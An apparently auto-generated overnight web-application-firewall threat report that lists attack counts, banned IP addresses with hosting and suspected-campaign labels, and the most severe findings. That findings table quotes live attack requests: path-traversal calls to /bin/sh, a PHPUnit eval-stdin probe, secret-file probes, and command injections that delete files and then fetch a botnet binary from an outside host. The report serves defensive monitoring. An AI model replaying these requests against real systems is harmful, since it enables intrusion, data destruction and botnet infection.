# Binteca Threat Map: night ending 2026-10-07

Window: 2026-10-06T18:00:00+02:00 to 2026-10-07T06:00:00+02:00 (UTC+02:00). Target point: Johannesburg, ZA.

## Totals

| Metric | Overnight |
|---|---:|
| Attacks at the edge | 2,093 |
| New bans at the edge | 39 |
| Attacks (all sensors) | 2,744 |
| New bans (all sensors) | 103 |
| Requests seen | 38,307 |
| Blocked at the edge | 733 |
| Active bans at report time | 68 |
| Sensors reporting | 4 |

| Sensor | Kind | Attacks | New bans | Active bans |
|---|---|---:|---:|---:|
| edge | edge | 2,093 | 39 | 34 |
| web-1 | web | 29 | 6 | 4 |
| web-2 | web | 45 | 10 | 2 |
| web-3 | web | 577 | 48 | 28 |

## Attack categories

| Category | Attacks |
|---|---:|
| cms-probe | 1,393 |
| secret-probe | 870 |
| protocol | 226 |
| code-injection | 129 |
| scanner | 123 |
| behaviour | 1 |

## Banned identifiers

- IP addresses banned: **85** (103 ban actions)
- E-mail addresses banned: 0
- Other identifiers banned: 0
- The WAF bans network addresses only; no e-mail or account identifiers appear in the source.

| IP | Country | City | ASN / org | Attack types | Bans | Max offence | State | Tags | Suspected actor (confidence) |
|---|---|---|---|---|---:|---:|---|---|---|
| `195.178.110.15` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:195.178.110.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `20.214.170.255` | KR | Yongsan-dong | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `195.178.110.199` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe, credential-probe | 1 | 4 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:195.178.110.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `62.146.226.80` | US | Newark | AS40021 Contabo Inc. | rce-payload | 1 | 2 | active | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `45.238.235.2` | BR | Ferraz de Vasconcelos | AS268350 R.R.COMUNICAÇÃO & MULTIMIDIA EIRELI | rce-payload | 1 | 4 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `169.40.142.224` | FR | Saint-Denis | AS215599 Zkillu SAS | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `45.138.12.10` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe, credential-probe | 3 | 3 | active | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `93.123.109.101` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | credential-probe, secret-probe | 3 | 1 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting | Suspected credential/secret-harvesting campaign (medium) |
| `177.8.71.123` | BR | Itaguaí | AS273663 Network internet | attack-tool, php-probe | 2 | 2 | active | repeat-offender | Automated attack tool (low) |
| `223.123.65.54` | PK | Islamabad | AS59257 CMPak Limited | rce-payload | 1 | 2 | expired | repeat-offender | Suspected Mirai-style IoT botnet (medium) |
| `102.244.97.185` | CM | Douala (Akwa I) | AS36912 Orange Cameroun SA | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `160.176.73.178` | MA | Souq Larb’a al Gharb | AS36903 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM | secret-probe | 2 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `193.32.162.156` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 3 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `193.32.162.175` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 3 | 2 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `169.58.214.236` | DE | Munich (Au-Haidhausen) | AS51167 Contabo GmbH | rce-payload | 2 | 2 | expired | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `172.86.86.158` | US | Ogden | AS14956 RouterHosting LLC | secret-probe | 2 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `193.32.162.164` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 2 | 2 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `34.23.170.28` | US | North Charleston | AS396982 Google LLC | secret-probe | 2 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `45.138.12.188` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 2 | 1 | active | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `47.95.234.23` | CN | Beijing | AS37963 Hangzhou Alibaba Advertising Co.,Ltd. | rce-payload | 2 | 2 | expired | hosting-provider, repeat-offender | Suspected exploit/RCE bot (low) |
| `64.247.196.151` | US | Las Vegas | AS11320 LightEdge Solutions | secret-probe | 2 | 2 | expired | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `82.102.18.222` | FR | Saint-Denis | AS9009 M247 Europe SRL | cms-probe | 2 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `103.216.170.129` | IN | Mumbai (Navjeevan Society) | AS135198 Bombay Bullion Commmunication | rce-payload | 1 | 3 | active | repeat-offender | Suspected Mirai-style IoT botnet (medium) |
| `103.46.186.148` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 1 | 3 | active | repeat-offender, cluster:103.46.186.0/24 | Suspected exploit/RCE bot (medium) |
| `103.46.186.85` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 1 | 2 | active | repeat-offender, cluster:103.46.186.0/24 | Suspected exploit/RCE bot (medium) |
| `104.244.74.39` | LU | Bissen | AS53667 FranTech Solutions | secret-probe | 1 | 4 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `111.90.180.172` | KH | Phnom Penh | AS38235 Angkor Data Communication | credential-probe | 1 | 4 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `118.145.104.105` | CN | Haidian (Haidian Qu) | AS137718 Beijing Volcano Engine Technology Co., Ltd. | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `124.158.13.141` | VN | Hanoi | AS38733 CMC Telecom Infrastructure Company | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `136.109.107.235` | US | The Dalles | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `138.122.21.19` | BR | Dias d'Ávila | AS264308 RM INFORMATICA LTDA | attack-tool | 1 | 2 | expired | repeat-offender | Automated attack tool (low) |
| `142.93.0.66` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `143.244.57.90` | FR | Paris | AS60068 Datacamp Limited | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `158.23.176.177` | MX | Querétaro City | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `158.255.83.176` | RU | Moscow | AS60904 ATC Telecom LTD. | command-injection | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `165.22.59.27` | SG | Singapore (Pioneer) | AS14061 DigitalOcean, LLC | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `172.68.151.42` | FR | Paris | AS13335 Cloudflare, Inc. | secret-probe | 1 | 1 | expired | cdn-edge | CDN edge relaying an attack (true origin hidden) (high) |
| `172.69.223.156` | FR | Paris | AS13335 Cloudflare, Inc. | secret-probe | 1 | 1 | expired | cdn-edge | CDN edge relaying an attack (true origin hidden) (high) |
| `172.71.119.90` | FR | Paris | AS13335 Cloudflare, Inc. | secret-probe | 1 | 1 | expired | cdn-edge | CDN edge relaying an attack (true origin hidden) (high) |
| `184.105.247.194` | US | Fremont (East Industrial) | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `187.108.1.142` | BR | Joinville | AS28267 SIM INTERNET PROVEDORES DE INTERNET EIRELI. | attack-tool | 1 | 4 | active | repeat-offender | Automated attack tool (low) |
| `187.87.144.234` | BR | Mogi das Cruzes | AS262686 Netwalk Telecomunicações em Inf. Ltda | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `190.111.110.13` | BR | Cubatão | AS270417 UP Down Telecom Ltda | attack-tool | 1 | 2 | expired | repeat-offender | Automated attack tool (low) |
| `199.165.159.33` | US | Pleasanton | AS22168 The Shadowserver Foundation, Inc. | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `199.165.159.65` | US | Pleasanton | AS22168 The Shadowserver Foundation, Inc. | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `2.28.13.214` | DE | Falkenstein | AS24940 Hetzner Online GmbH | rce-payload | 1 | 1 | active | hosting-provider | Suspected exploit/RCE bot (low) |
| `20.214.145.90` | KR | Yongsan-dong | AS8075 Microsoft Corporation | php-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `200.219.11.15` | BR | Cachoeirinha | AS270805 IPVDATA TECNOLOGIA E COMPUTACAO EM NUVEM LTDA | attack-tool | 1 | 1 | active |  | Automated attack tool (low) |
| `209.38.248.17` | DE | Ediger-Eller | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `216.126.237.47` | US | Ogden | AS14956 RouterHosting LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `216.218.206.68` | US | San Ramon | AS6939 Hurricane Electric LLC | secret-probe | 1 | 2 | active | research-scanner, repeat-offender | Internet research scanner (benign) (high) |
| `216.81.248.89` | US | Las Vegas | AS11320 LightEdge Solutions | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `221.159.119.6` | KR | Seongnam-si (Jeongja-dong) | AS4766 Korea Telecom | command-injection | 1 | 3 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `34.133.94.182` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.53.119.204` | US | The Dalles | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `34.73.22.186` | US | North Charleston | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `35.201.196.175` | TW | Taoyuan | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `41.38.160.135` | EG | Al Khuşūş | AS8452 TE-AS | command-injection | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `45.138.12.6` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | secret-probe | 1 | 1 | active | abuse-prone-hosting, cluster:45.138.12.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.120` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.14` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.171` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.148.10.74` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe, behaviour | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:45.148.10.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.156.87.131` | NL | Amsterdam | AS197170 TechTies Inc. | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `45.225.135.21` | NL | Amsterdam | AS64107 RACK SPHERE HOSTING S.A. | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `45.70.164.148` | BR | Itaguaí | AS267578 WILLIAN MENDES DE OLIVEIRA ­ ME | attack-tool | 1 | 1 | expired |  | Automated attack tool (low) |
| `45.78.224.85` | SG | Singapore | AS150436 Byteplus Pte. Ltd. | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `62.60.130.117` | GB | London | AS215930 CIPHER OPERATIONS DOO BEOGRAD - NOVI BEOGRAD | cms-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Known-bad scanning infrastructure (medium) |
| `64.204.51.37` | US | Ashburn | AS219329 ASN-FEIT | secret-probe | 1 | 1 | active |  | Suspected credential/secret-harvesting campaign (low) |
| `64.62.156.222` | US | Pleasanton | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | firehol-level1, research-scanner | Internet research scanner (benign) (high) |
| `64.89.161.82` | LU | Schieren | AS36680 Netiface LLC | secret-probe | 1 | 4 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `65.49.1.182` | US | Pleasanton | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | active | firehol-level1, research-scanner | Internet research scanner (benign) (high) |
| `68.69.177.112` | US | Hollis | AS402226 OnlyScans LLC | php-probe | 1 | 3 | active | research-scanner, repeat-offender | Internet research scanner (benign) (medium) |
| `73.53.43.220` | US | Everett | AS7922 Comcast Cable Communications, LLC | rce-payload | 1 | 2 | active | repeat-offender | Suspected exploit/RCE bot (low) |
| `8.163.68.110` | CN | Guangzhou | AS37963 Hangzhou Alibaba Advertising Co.,Ltd. | secret-probe, rce-payload | 1 | 1 | expired | hosting-provider | Suspected Androxgh0st-style Laravel/PHPUnit exploitation (low) |
| `8.231.188.50` | US | The Dalles | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `81.171.72.135` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired | cluster:81.171.72.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `81.171.72.93` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired | cluster:81.171.72.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `83.143.112.7` | FI | Helsinki | AS215439 PLAY2GO INTERNATIONAL LIMITED | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `91.92.242.37` | NL | Amsterdam | AS202412 Omegatech LTD | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `91.92.41.115` | BG | Sofia | AS211443 SINO WORLDWIDE TRADING LIMITED | secret-probe | 1 | 2 | expired | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `92.113.211.177` | US | Dallas | AS219329 ASN-FEIT | secret-probe | 1 | 1 | active | cluster:92.113.211.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `92.113.211.53` | US | Dallas | AS219329 ASN-FEIT | secret-probe | 1 | 1 | active | cluster:92.113.211.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `93.152.221.85` | DE | Frankfurt am Main | AS197170 TechTies Inc. | command-injection | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected Mirai-style IoT botnet (medium) |
| `94.154.43.125` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 4 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |

## Top sources by request count

| IP | Requests | Country | ASN / org | Status |
|---|---:|---|---|---|
| `195.178.110.15` | 194 | AD | AS48090 TECHOFF SRV LIMITED | ban expired 22:45 |
| `20.214.170.255` | 188 | KR | AS8075 Microsoft Corporation | ban expired 22:16 |
| `195.178.110.199` | 149 | AD | AS48090 TECHOFF SRV LIMITED | banned until Tue 13 Oct 20:02 |
| `45.138.12.24` | 81 | HK | AS218785 TC DATACENTER LIMITED | spared: shared address |
| `62.146.226.80` | 40 | US | AS40021 Contabo Inc. | banned until Wed 06:45 |
| `45.238.235.2` | 29 | BR | AS268350 R.R.COMUNICAÇÃO & MULTIMIDIA EIRELI | banned until Wed 14 Oct 03:58 |
| `3.129.187.38` | 20 | US | AS16509 Amazon.com, Inc. | not banned; spared: behaviour only |
| `18.218.118.203` | 16 | US | AS16509 Amazon.com, Inc. | spared: behaviour only |
| `169.40.142.224` | 9 | FR | AS215599 Zkillu SAS | ban expired 04:06 |
| `45.138.12.10` | 5 | HK | AS218785 TC DATACENTER LIMITED | banned until Wed 19:15 |
| `93.123.109.101` | 4 | AD | AS48090 TECHOFF SRV LIMITED | banned until Wed 06:42 |
| `177.8.71.123` | 3 | BR | AS273663 Network internet | not banned |
| `223.123.65.54` | 3 | PK | AS59257 CMPak Limited | ban expired 00:43 |
| `66.132.195.109` | 3 | US | AS398324 Censys, Inc. | not banned |
| `102.244.97.185` | 2 | CM | AS36912 Orange Cameroun SA | ban expired 22:37 |
| `159.223.66.123` | 2 | SG | AS14061 DigitalOcean, LLC | not banned |
| `160.176.73.178` | 1 | MA | AS36903 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM | ban expired 02:16 |

## Most severe findings

| Severity | Rule | Requests | Addresses | First | Example source | Example request |
|---|---|---:|---:|---|---|---|
| critical | Secret or VCS file probe (BW-SEC-01) | 635 | 31 | 18:12 | `142.93.0.66` | `GET /.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 83 | 5 | 20:02 | `195.178.110.199` | `GET /wp-config.php` |
| critical | PHP or shell payload (BW-RCE-03) | 1 | 1 | 22:25 | `8.163.68.110` | `GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php` |
| critical | Secret or VCS file probe (BW-SEC-01) | 11 | 5 | 18:39 | `64.247.196.151` | `GET /.git/config` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 1 | 1 | 05:42 | `93.123.109.101` | `GET /ai/credentials.json` |
| critical | PHP or shell payload (BW-RCE-03) | 10 | 5 | 18:43 | `223.123.65.54` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 3 | 3 | 18:46 | `193.32.162.156` | `GET /.svn/wc.db` |
| critical | Shell command injection (BW-RCE-02) | 2 | 2 | 20:14 | `93.152.221.85` | `GET /shell?cd+/var/dev;rm+-rf+*;wget+http[:]//176.65.139.139/bins/xnxnxnxnxnxnxnxnx86_64xnxn+-O+…` |
| critical | Secret or VCS file probe (BW-SEC-01) | 125 | 22 | 18:02 | `64.247.196.151` | `GET /.git/config` |
| critical | PHP or shell payload (BW-RCE-03) | 114 | 12 | 19:20 | `103.216.170.129` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 12 | 5 | 20:19 | `45.138.12.24` | `GET /credentials.json` |
| critical | Shell command injection (BW-RCE-02) | 3 | 2 | 22:40 | `158.255.83.176` | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//158.255.83.176:…` |
| high | Attack tool user agent (BW-UA-01) | 4 | 4 | 20:39 | `40.67.173.117` | `GET /manager/html` |
| high | Run of missing-page requests (BW-BEH-01) | 1 | 1 | 21:45 | `45.148.10.74` | `GET /api/package.json` |
| high | Attack tool user agent (BW-UA-01) | 4 | 4 | 18:48 | `40.124.116.159` | `POST /mcp` |
| high | Attack tool user agent (BW-UA-01) | 11 | 11 | 18:48 | `186.248.73.98` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 104 | 91 | 18:37 | `186.248.73.98` | `GET /` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 8 | 2 | 21:42 | `159.223.66.123` | `POST /wp-json/batch/v1` |
| medium | PHP script probe (BW-PHP-01) | 5 | 3 | 18:31 | `186.248.73.98` | `GET /admin/config.php` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 4 | 3 | 18:49 | `157.230.20.243` | `GET /HNAP1` |

## Indicators from payloads (defanged)

| Indicator | Port | Kind | Context | Seen from |
|---|---|---|---|---|
| `176[.]65[.]139[.]139` |  | payload-download-host | Shell command injection payload fetches /bins/xnxnxnxnxnxnxnxnx86_64xnxn | `93.152.221.85` |
| `158[.]255[.]83[.]176` |  | payload-download-host | Shell command injection payload fetches / | `158.255.83.176` |

## Suspected actors and campaigns

Labels are heuristic groupings of infrastructure and behaviour, **not attribution**. See the README.

| Suspected actor / campaign | Confidence | Addresses | Top countries | Evidence |
|---|---|---:|---|---|
| Suspected credential/secret-harvesting campaign | medium | 38 | US 13, NL 8, AD 7, HK 4, LU 2 | hunts for .env, VCS or credential files; listed on Spamhaus DROP; listed on FireHOL level 1; AS48090 TECHOFF SRV (abuse-prone hosting) |
| Suspected exploit/RCE bot | medium | 17 | US 2, BR 2, DE 2, CN 2, ID 2 | sent a shell or PHP payload; 2 addresses from 103.46.186.0/24 (AS150462) attacked the same night |
| Internet research scanner (benign) | high | 12 | US 11, DE 1 | reverse DNS scan.visionheight.com; ASN organisation matches 'shadowserver'; ASN organisation matches 'censys'; reverse DNS b1cb777a43.scan.leakix.org |
| Suspected CMS exploitation bot | low | 9 | FR 3, KR 2, SG 2, MX 1, DE 1 | CMS, admin panel or PHP script probing |
| Automated attack tool | low | 9 | BR 7, US 2 | request carried a known attack-tool user agent |
| Suspected Mirai-style IoT botnet | medium | 4 | PK 1, IN 1, RU 1, DE 1 | IoT/router exploit path with a downloader typical of Mirai-family loaders; payload fetches an architecture-named binary from /bins/ |
| CDN edge relaying an attack (true origin hidden) | high | 3 | FR 3 | AS13335 Cloudflare is a CDN; the real client is behind it |
| Known-bad scanning infrastructure | medium | 1 | GB 1 | listed on Spamhaus DROP; listed on FireHOL level 1 |
| Suspected Androxgh0st-style Laravel/PHPUnit exploitation | low | 1 | CN 1 | probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A; no request bodies are logged, so the malware family cannot be confirmed |

_Binteca Threat Map (https://cybermap.binteca.io), generated 2026-10-07T11:35:13Z from the overnight WAF summary. Geolocation: DB-IP Lite (CC BY 4.0)._
